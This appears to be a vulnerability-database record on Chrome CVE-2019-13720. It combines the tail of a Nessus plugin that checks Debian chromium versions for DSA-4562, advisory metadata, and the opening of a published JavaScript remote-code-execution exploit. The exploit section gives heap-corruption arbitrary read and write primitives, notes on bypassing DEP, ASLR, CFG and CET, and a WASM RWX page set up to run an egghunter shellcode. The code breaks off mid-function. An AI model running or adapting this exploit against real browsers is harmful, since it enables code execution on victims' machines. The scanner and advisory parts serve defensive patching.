CVE-2019-13699\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13700\n Man Yue Mo discovered a buffer overflow issue.\n\n - CVE-2019-13701\n David Erceg discovered a URL spoofing issue.\n\n - CVE-2019-13702\n Phillip Langlois and Edward Torkington discovered a\n privilege escalation issue in the installer.\n\n - CVE-2019-13703\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13704\n Jun Kokatsu discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2019-13705\n Luan Herrera discovered a way to bypass extension\n permissions.\n\n - CVE-2019-13706\n pdknsk discovered an out-of-bounds read issue in the\n pdfium library.\n\n - CVE-2019-13707\n Andrea Palazzo discovered an information leak.\n\n - CVE-2019-13708\n Khalil Zhani discovered an authentication spoofing\n issue.\n\n - CVE-2019-13709\n Zhong Zhaochen discovered a way to bypass download\n restrictions.\n\n - CVE-2019-13710\n bernardo.mrod discovered a way to bypass download\n restrictions.\n\n - CVE-2019-13711\n David Erceg discovered an information leak.\n\n - CVE-2019-13713\n David Erceg discovered an information leak.\n\n - CVE-2019-13714\n Jun Kokatsu discovered an issue with Cascading Style\n Sheets.\n\n - CVE-2019-13715\n xisigr discovered a URL spoofing issue.\n\n - CVE-2019-13716\n Barron Hagerman discovered an error in the service\n worker implementation.\n\n - CVE-2019-13717\n xisigr discovered a user interface spoofing issue.\n\n - CVE-2019-13718\n Khalil Zhani discovered a way to spoof Internationalized\n Domain Names.\n\n - CVE-2019-13719\n Khalil Zhani discovered a user interface spoofing issue.\n\n - CVE-2019-13720\n Anton Ivanov and Alexey Kulaev discovered a\n use-after-free issue.\n\n - CVE-2019-13721\n banananapenguin discovered a use-after-free issue in the\n pdfium library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5869\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13664\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13668\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13675\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13676\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2019-13681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13691\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13700\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13703\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13704\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13717\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4562\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), support for chromium has\nbeen discontinued. 
Please upgrade to the stable release (buster) to\ncontinue receiving chromium updates or switch to firefox, which\ncontinues to be supported in the oldstable release.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 78.0.3904.97-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5878\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-03-23T22:33:18", "description": "# cve-2019-13720\n\nCVE-2019-13720 E...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 
5.9}, "published": "2019-11-04T12:40:28", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2021-12-05T22:15:46", "id": "B8E18FAC-F86B-5BA2-9E5B-D9FA2576FED9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:04:26", "description": "# CVE-2019-13720(a.k.a WizardOpium) PoC\nwork chrom...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-21T16:21:16", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2021-12-05T22:15:54", "id": "CDF24E57-44DE-5297-B49D-D4E0AEE3F0AB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "redhatcve": [{"lastseen": "2022-07-09T18:39:55", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-04T18:56:15", "type": "redhatcve", "title": "CVE-2019-13720", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-07-09T17:08:53", "id": "RH:CVE-2019-13720", "href": "https://access.redhat.com/security/cve/cve-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-11T17:26:37", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "packetstorm", "title": "Google Chrome 78.0.3904.70 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-05-11T00:00:00", "id": "PACKETSTORM:167066", "href": "https://packetstormsecurity.com/files/167066/Google-Chrome-78.0.3904.70-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution \n# Date: 2022-05-03 \n# Exploit Author: deadlock (Forrest Orr) \n# Type: RCE \n# Platform: Windows \n# Website: https://forrest-orr.net \n# Twitter: https://twitter.com/_ForrestOrr \n# Vendor Homepage: https://www.google.com/chrome/ \n# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip \n# Versions: Chrome 76 - 78.0.3904.70 \n# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64 \n# CVE: CVE-2019-13720 \n# Bypasses: DEP, High Entropy ASLR, CFG, CET \n# Github: https://github.com/forrest-orr/WizardOpium \n \n<html> \n<script> \n/*;; --------------------------------------------------------------------- | \n;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium | \n;;;; 
--------------------------------------------------------------------- | \n;;;; Author: deadlock (Forrest Orr) - 2022 | \n;;;; --------------------------------------------------------------------- | \n;;;; Licensed under GNU GPLv3 | \n;;;; --------------------------------------------------------------------- | \n;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 | \n;;;; 64-bit with CPU core counts: | \n;;;; ~ 16 cores (non-virtualized) | works | \n;;;; ~ 4 cores (virtualized) | works | \n;;;; ~ 2 cores (virtualized) | works | \n;;;; ~ 1 core (virtualized) | fails | \n;;;; | \n;;;; All of these tests finished successfully with a 95%+ success rate | \n;;;; with the exception of the 1 core tests, which fail with a 100% | \n;;;; frequency. Due to the nature of the exploit as both a UAF highly | \n;;;; sensitive to the state of the heap and a race condition, it appears | \n;;;; that a single core is unable to reliably reproduce the UAF or any | \n;;;; kind of consistency in the heap between executions. | \n;;;; --------------------------------------------------------------------- | \n;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET | \n;;;; --------------------------------------------------------------------- | \n;;;; ## Sandboxing | \n;;;; ~ Chrome uses an isolated content child process running under a | \n;;;; restricted token below Low Integrity to render JavaScript. | \n;;;; ~ Child process creation is restricted via Windows exploit | \n;;;; mitigation features on the OS level for Chrome renderers. | \n;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a | \n;;;; sandbox escape (this was limited to Windows 7 since in newer | \n;;;; versions of Windows win32k syscalls are locked in Chrome for | \n;;;; security purposes). | \n;;;; ~ Run Chrome with the \"--no-sandbox\" parameter in order to execute | \n;;;; the WinExec shellcode within this exploit source. 
| \n;;;; --------------------------------------------------------------------- | \n;;;; ## Notes | \n;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist | \n;;;; for both infoleaks and R/W primitives. | \n;;;; ~ The exploit should in theory work in any version of Chrome up to | \n;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. | \n;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is | \n;;;; initialized resulting in the creation of a single page of +RWX | \n;;;; JIT memory. This is then overwritten with a 673 byte egghunter | \n;;;; shellcode. | \n;;;; ~ The egghunter will scan through all committed +RW regions of | \n;;;; private memory within the compromised chrome.exe renderer process | \n;;;; and mark any region it identifies as +RWX which contains the egg | \n;;;; QWORD bytes and subsequently execute it via a CALL instruction. | \n;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 | \n;;;; array prefixed by the following egg QWORD bytes: | \n;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 | \n;;;; --------------------------------------------------------------------- | \n;;;; ## Credits | \n;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit | \n;;;; chain in the wild. 
| \n;;;; -------------------------------------------------------------------- */ \n \nlet DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory. \nlet GcPreventer = []; \nlet IIRFilters = []; \nvar SharedAudioCtx = undefined; \nlet FeedforwardSuperPageMetadata = undefined; \nlet OutputFloatArray = new Float32Array(10); \nlet MutableFreeListAudioBufs = []; \nlet DoubleAllocAudioBufs = []; \nlet ImageDataArray = []; \nconst EnableDebug = true; \nconst AlertOutput = false; \nvar HelperBuf = new ArrayBuffer(8); \nvar HelperDbl = new Float64Array(HelperBuf); \nvar HelperDword = new Uint32Array(HelperBuf); \nvar HelperBigInt = new BigUint64Array(HelperBuf); \nvar HelperUint8 = new Uint8Array(HelperBuf); \n \nfunction DebugLog(Message) { \nif(EnableDebug) { \nif(AlertOutput) { \nalert(Message); \n} \nelse { \nconsole.log(Message); // In IE, console only works if devtools is open. 
\n} \n} \n} \n \nfunction Sleep(delay) { \nreturn new Promise(resolve => setTimeout(resolve, delay)) \n} \n \nfunction ReverseBigInt(Val) { \nlet ReversedVal = BigInt(0); \nlet TempVal = Val; \n \nfor (let i = 0; i < 8; i++) { \nReversedVal = ReversedVal << BigInt(8); \nReversedVal += TempVal & BigInt(0xFF); \nTempVal = TempVal >> BigInt(8); \n} \n \nreturn ReversedVal; \n} \n \nfunction ClearBigIntLow21(Val) { \nlet BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111 \nlet ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000 \nreturn ClearedVal; \n} \n \nlet GetSuperPageBase = ClearBigIntLow21; \n \nfunction GetSuperPageMetadata(LeakedPtr) { \nlet SuperPageBase = GetSuperPageBase(LeakedPtr); \nreturn SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pages, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page \n} \n \nfunction GetPartitionPageIndex(LeakedPtr) { \nlet Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1); \nlet Index = (LeakedPtr & Low21Mask) >> BigInt(14); \nreturn Index; \n} \n \n \nfunction GetPartitionPageMetadata(LeakedPtr) { \nlet Index = GetPartitionPageIndex(LeakedPtr); \nlet partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20)); \nreturn partitionPageMetadataPtr; \n} \n \nfunction GetPartitionPageBase(LeakedPtr, Index) { \nlet SuperPageBase = GetSuperPageBase(LeakedPtr); \nlet PartitionPageBase = SuperPageBase + (Index << BigInt(14)); \nreturn PartitionPageBase; \n} \n \nfunction GC() { \nlet MyPromise = new Promise(function(GcCallback) { \nlet Arg; \n \nfor (var i = 0; i < 400; i++) { \nnew ArrayBuffer(1024 * 1024 * 60).buffer; \n} \n \nGcCallback(Arg); \n}); \n \nreturn MyPromise; \n} \n \n/* \nchrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf: \n00007ffa`cc086513 488b0e mov rcx,qword ptr 
[rsi] ds:00007ffe`0fc70000=???????????????? \n*/ \n \nfunction LeakQword(FreeListHead, TargetAddress) { \nFreeListHead[0] = TargetAddress; \nlet TempVal = new BigUint64Array; \nTempVal.buffer; \nGcPreventer.push(TempVal); \nreturn ReverseBigInt(FreeListHead[0]); \n} \n \nfunction WriteQword(FreeListHead, TargetAddress, Val) { \nFreeListHead[0] = TargetAddress; \nlet TempVal = new BigUint64Array(1); \nTempVal.buffer; \nTempVal[0] = Val; \nGcPreventer.push(TempVal); \n} \n \nfunction CreateWasmJITExport() { \n/* \nAfter this function returns, a new region of memory will appear with a \nsingle system page of 0x1000 bytes set to RWX for the JIT region for \nthis WASM module \n \n0x00000ACDB6790000:0x40000000 | Private \n0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory \n0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory \n*/ \n \nvar ImportObj = { imports: { imported_func: arg => console.log(arg) } }; \nconst WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nconst WasmCode = new Uint8Array(WasmModuleBytes); \nconst WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj); \nreturn WasmModule.exports.exported_func; \n} \n \n/* \nstruct __attribute__((packed)) SlotSpanMetadata { \nunsigned long freelist_head; \nunsigned long next_slot_span; \nunsigned long bucket; \nuint32_t marked_full : 1; \nuint32_t num_allocated_slots : 13; \nuint32_t num_unprovisioned_slots : 13; \nuint32_t can_store_raw_size : 1; \nuint32_t freelist_is_sorted : 1; \nuint32_t unused1 : (32 - 1 - 2 * 13 - 1 
- 1); \nuint16_t in_empty_cache : 1; \nuint16_t empty_cache_index : 7; \nuint16_t unused2 : (16 - 1 - 7); \n}; \n \nstruct PartitionPage { \nunion { \nstruct SlotSpanMetadata span; \nsize_t raw_size; \nstruct PartitionSuperPageExtentEntry head; \nstruct { \nchar pad[32 - sizeof(uint16_t)]; \nuint16_t slot_span_metadata_offset; \n}; \n}; \n}; \n \nstruct PartitionBucket { \nunsigned long active_slot_spans_head; \nunsigned long empty_slot_spans_head; \nunsigned long decommitted_slot_spans_head; \nuint32_t slot_size; \nuint32_t num_system_pages_per_slot_span : 8; \nuint32_t num_full_slot_spans : 24; \n}; \n*/ \n \nfunction HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) { \nfor(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) { \nSlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct \nHelperBigInt[0] = SlotSpanMetaAddress; \nDebugLog(\"... targetting slot span metadata at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + 